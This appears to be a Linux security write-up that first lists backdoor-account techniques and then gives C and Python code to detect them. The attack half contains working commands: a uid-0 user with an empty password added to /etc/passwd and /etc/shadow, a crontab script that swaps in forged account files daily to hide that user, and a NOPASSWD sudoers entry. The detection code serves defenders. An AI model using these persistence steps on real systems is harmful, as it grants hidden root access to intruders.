Linux Hackers/Suspicious Account Detection

catalog

1. Linux hacker account attack vectors
2. Linux suspicious account detection model

1. Linux hacker account attack vectors

0x1: Adding the hacker account to the "root" group

1. useradd hacker -p hacker123
2. usermod -a -G root hacker
3. id hacker

0x2: Adding a system account without using system commands

1. vim /etc/passwd
Append the line: musicyxy:x:0:0::/:/bin/bash

2. vim /etc/shadow
Append the line: musicyxy::13407:0:99999:7:::
// save and quit (:wq!)

0x3: Hiding the account with crontab

1. Use crontab (scheduled tasks) to hide the hacker account
2. Keep the forged passwd and shadow files used to hide the account somewhere else (e.g. /tmp/passwd, /tmp/shadow); the originals (/etc/passwd, /etc/shadow) stay untouched
3. Append the two entries musicyxy:x:0:0::/:/bin/sh and musicyxy::13407:0:99999:7::: to the forged passwd and shadow files
4. At a fixed time each day, swap the forged passwd and shadow files into /etc/ (after backing up the genuine files), and once the time window has passed, restore the genuine files
5. The account can then log in only while the forged files are in effect; outside that window the forged files are automatically replaced by the normal ones, which makes the account harder for administrators to notice

shell

#!/bin/bash
# at 11:40 every day, run cat /etc/passwd > /dev/ttypwd (stash the genuine files)
echo '40 11 * * * cat /etc/passwd > /dev/ttypwd' >> /etc/door.cron;
echo '40 11 * * * cat /etc/shadow > /dev/ttysdw' >> /etc/door.cron;
echo '41 11 * * * echo "musicyxy:x:0:0::/:/bin/sh" >> /etc/passwd' >> /etc/door.cron;
echo '41 11 * * * echo "musicyxy::9999:0:99999:7:::" >> /etc/shadow' >> /etc/door.cron;
# at 12:09 every day, roll the original passwd and shadow files back
echo '09 12 * * * cat /dev/ttypwd > /etc/passwd' >> /etc/door.cron;
echo '09 12 * * * cat /dev/ttysdw > /etc/shadow' >> /etc/door.cron;
echo '10 12 * * * rm -f /dev/ttypwd' >> /etc/door.cron;
echo '10 12 * * * rm -f /dev/ttysdw' >> /etc/door.cron;
service crond restart;
crontab /etc/door.cron;

This way the backdoor account is live for a daily window of 11:40 to 12:09.

0x4: Adding a non-root account with UID=0

1. Add an ordinary user: useradd hacker -p hacker123
// the new user gets a home directory hacker under /home

2. Delete the user's home directory
rm -rf /home/hacker

3. Grant privileges
vim /etc/passwd
Change the new user's uid and gid to 0:
hacker:x:501:501::/home/hacker:/bin/bash -> hacker:x:0:0::/home/hacker:/bin/bash
or
useradd -u 0 -o -g root -G root -d /home/hacker hacker

0x5: Hiding a privileged account with sudo

Wherever the sudoers file lives, sudo provides a command for editing it: visudo. It validates the configuration for you, and if something is wrong it tells you which section is faulty when you save and exit.

<user list> <host list> = <operator list> <tag list> <command list>
//hacker ALL=(ALL) NOPASSWD: ALL
1. user list: users or groups, or a previously defined alias list; users are given by username, groups are prefixed with %, e.g. %admin
2. host list: hostnames or an alias list
3. operator list: the runas user, i.e. which user's or group's privileges the command runs with
4. tag list: the most commonly used tag is NOPASSWD: with it no password is required
5. command list: the command, or list of commands, that may be run

Attack steps

1. vim /etc/sudoers
2. Add the line: hacker ALL=(ALL) NOPASSWD: ALL
3. sudo -u root /mnt/sudodir/cmd now runs without asking for a password
4. The hacker user can thus switch to any user and run any command


2. Linux suspicious account detection model

0x1: Detecting non-root users in the root group

1. Run the shell command cut -d: -f1 /etc/passwd to obtain the current account list
2. Iterate over the list, calling getpwnam and getgrgid to obtain each account's pw_name, pw_uid and pw_gid
3. Check for anomalous accounts
    1) a non-root account whose uid is 0
    2) a non-root account whose gid is 0
    3) a non-root account whose shell is /bin/bash or /bin/sh (rather than /sbin/nologin)

Code Example

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <grp.h>
#include <pwd.h>
#include <unistd.h>
#include <errno.h>
#include <sys/types.h>

// Print the passwd record and primary group of one account.
// getpwnam()/getgrgid() return pointers to static storage owned by libc,
// so nothing is allocated or freed here.
void getUserInfo(const char *name)
{
    struct passwd *pw;
    struct group *grp;

    if (name == NULL || name[0] == '\0')
    {
        return;
    }

    errno = 0;
    pw = getpwnam(name);
    if (!pw)
    {
        printf("Couldn't find out about user %s, %d.\n", name, errno);
        return;
    }
    printf("User login name is %s.\n", pw->pw_name);
    printf("User uid is %d.\n", (int) pw->pw_uid);
    printf("User gid is %d.\n", (int) pw->pw_gid);
    printf("User home directory is %s.\n", pw->pw_dir);
    printf("User default shell is %s.\n", pw->pw_shell);

    // group info
    grp = getgrgid(pw->pw_gid);
    if (!grp)
    {
        printf("Couldn't find out about group %d.\n", (int) pw->pw_gid);
        return;
    }
    printf("User default group is %s (%d).\n", grp->gr_name, (int) pw->pw_gid);
}

int main()
{
    // step 1: obtain the account list from /etc/passwd
    FILE *fp = popen("cut -d: -f1 /etc/passwd", "r");
    if (fp == NULL)
    {
        return 1;
    }
    char line[1024];
    while (fgets(line, sizeof(line), fp) != NULL)
    {
        // fgets keeps the trailing newline; strip it, otherwise
        // getpwnam("root\n") fails for every account
        line[strcspn(line, "\n")] = '\0';
        getUserInfo(line);
    }
    pclose(fp);

    return 0;
}

//g++ healthchcker.cpp -o healthchcker
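The checks listed in step 3 above, as an added example rather than the page's own code, in Python instead of the page's C++: it parses passwd- and group-format text (constructed sample data stands in for /etc/passwd and /etc/group) and flags uid 0 and gid 0 on non-root accounts plus supplementary membership of the root group (the 0x1 vector). It narrows the page's third rule to interactive shells on system accounts, so that ordinary users are not flagged, using an assumed UID_MIN of 1000.

```python
UID_MIN = 1000                 # assumption: first regular-user UID (login.defs UID_MIN)
INTERACTIVE_SHELLS = {"/bin/bash", "/bin/sh"}

def parse_passwd(text):
    """Return [(name, uid, gid, shell)] for each well-formed 7-field passwd line."""
    users = []
    for line in text.splitlines():
        f = line.split(":")
        if len(f) != 7 or not f[0] or not (f[2].isdigit() and f[3].isdigit()):
            continue               # blank, truncated or non-numeric line: skip, do not crash
        users.append((f[0], int(f[2]), int(f[3]), f[6]))
    return users

def root_group_members(text):
    """Names listed as supplementary members of any group line whose gid is 0."""
    members = set()
    for line in text.splitlines():
        f = line.split(":")
        if len(f) == 4 and f[2] == "0" and f[3]:
            members.update(m for m in f[3].split(",") if m)
    return members

def find_suspicious(passwd_text, group_text=""):
    """Map account name -> reasons it looks like a planted privileged account."""
    findings = {}
    def flag(name, reason):
        findings.setdefault(name, []).append(reason)
    for name, uid, gid, shell in parse_passwd(passwd_text):
        if name == "root":
            continue               # the only account expected to carry uid/gid 0
        if uid == 0:
            flag(name, "uid 0 on a non-root account")
        if gid == 0:
            flag(name, "primary gid 0 on a non-root account")
        if uid < UID_MIN and shell in INTERACTIVE_SHELLS:
            flag(name, "system account with interactive shell " + shell)
    for name in root_group_members(group_text) - {"root"}:
        flag(name, "supplementary member of the root group (gid 0)")
    return findings

# Constructed sample data standing in for /etc/passwd and /etc/group.
SAMPLE_PASSWD = (
    "root:x:0:0:root:/root:/bin/bash\n"
    "backup:x:34:34:backup:/var/backups:/bin/sh\n"
    "alice:x:1000:1000:Alice:/home/alice:/bin/bash\n"
    "hacker:x:1001:1001::/home/hacker:/bin/bash\n"
    "musicyxy:x:0:0::/:/bin/bash\n"
)
SAMPLE_GROUP = "root:x:0:hacker\nusers:x:100:alice\n"
```

On a live host, pass the contents of /etc/passwd and /etc/group to find_suspicious and review each reason; the shell rule is the noisiest and is best read alongside the others.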


0x2: Detecting anomalous /etc/sudoers configuration

1. Open /etc/sudoers
2. Handle include directives recursively
3. Check for suspicious entries other than "root    ALL=(ALL)     ALL"
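The three steps above as an added example in Python (not the page's code): it walks an in-memory sudoers tree following #include and #includedir (and their @ spellings) as sudoers(5) describes, skips includedir entries whose names contain a dot or end in ~ just as sudo does, guards against include loops, and reports every user specification other than root ALL=(ALL) ALL, marking the NOPASSWD ones. The paths and file contents in FILES are constructed sample data.

```python
import re

# Constructed in-memory stand-in for /etc/sudoers and /etc/sudoers.d, so the check runs offline.
FILES = {
    "/etc/sudoers": (
        "Defaults env_reset\n"
        "# comment line, ignored\n"
        "root    ALL=(ALL)       ALL\n"
        "%sudo ALL=(ALL:ALL) ALL\n"
        "#includedir /etc/sudoers.d\n"
    ),
    "/etc/sudoers.d/README": "# placeholder\n",
    "/etc/sudoers.d/99-ops": "ops ALL=(root) /usr/bin/systemctl\n",
    "/etc/sudoers.d/hacker.bak": "hacker ALL=(ALL) NOPASSWD: ALL\n",  # sudo skips names with '.'
    "/etc/sudoers.d/zz-door": "hacker ALL=(ALL) NOPASSWD: ALL\n",
}

INCLUDE = re.compile(r"^[#@]include(dir)?\s+(\S+)")        # #include FILE / #includedir DIR / @ forms
BASELINE = re.compile(r"^root\s+ALL\s*=\s*\(ALL\)\s+ALL$")  # the one user spec treated as expected
NOT_A_SPEC = ("Defaults", "User_Alias", "Host_Alias", "Cmnd_Alias", "Runas_Alias")

def expand(path, files, seen=None):
    """Yield (source_path, line) for each non-comment line, following includes; each file once."""
    seen = set() if seen is None else seen
    if path in seen:                                # include loop or duplicate include
        return
    seen.add(path)
    for raw in files.get(path, "").splitlines():
        line = raw.strip()
        m = INCLUDE.match(line)
        if m and m.group(1):                        # includedir: plain-named files in DIR, lexical order
            for p in sorted(files):
                d, base = p.rsplit("/", 1)
                if d == m.group(2).rstrip("/") and "." not in base and not base.endswith("~"):
                    yield from expand(p, files, seen)
        elif m:                                     # include: a single file
            yield from expand(m.group(2), files, seen)
        elif line and not line.startswith("#"):
            yield path, line

def suspicious_specs(root="/etc/sudoers", files=FILES):
    """Return [(path, spec, has_nopasswd)] for every user spec other than the root baseline."""
    out = []
    for path, line in expand(root, files):
        if line.startswith(NOT_A_SPEC) or BASELINE.match(line):
            continue
        out.append((path, line, "NOPASSWD" in line))
    return out
```

Against a real system, replace FILES with a dict read from disk (root-owned, mode 0440 files) and review each reported spec; group specs such as %sudo are reported too, since the page treats everything beyond the root baseline as needing review.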

Copyright (c) 2015 LittleHann All rights reserved
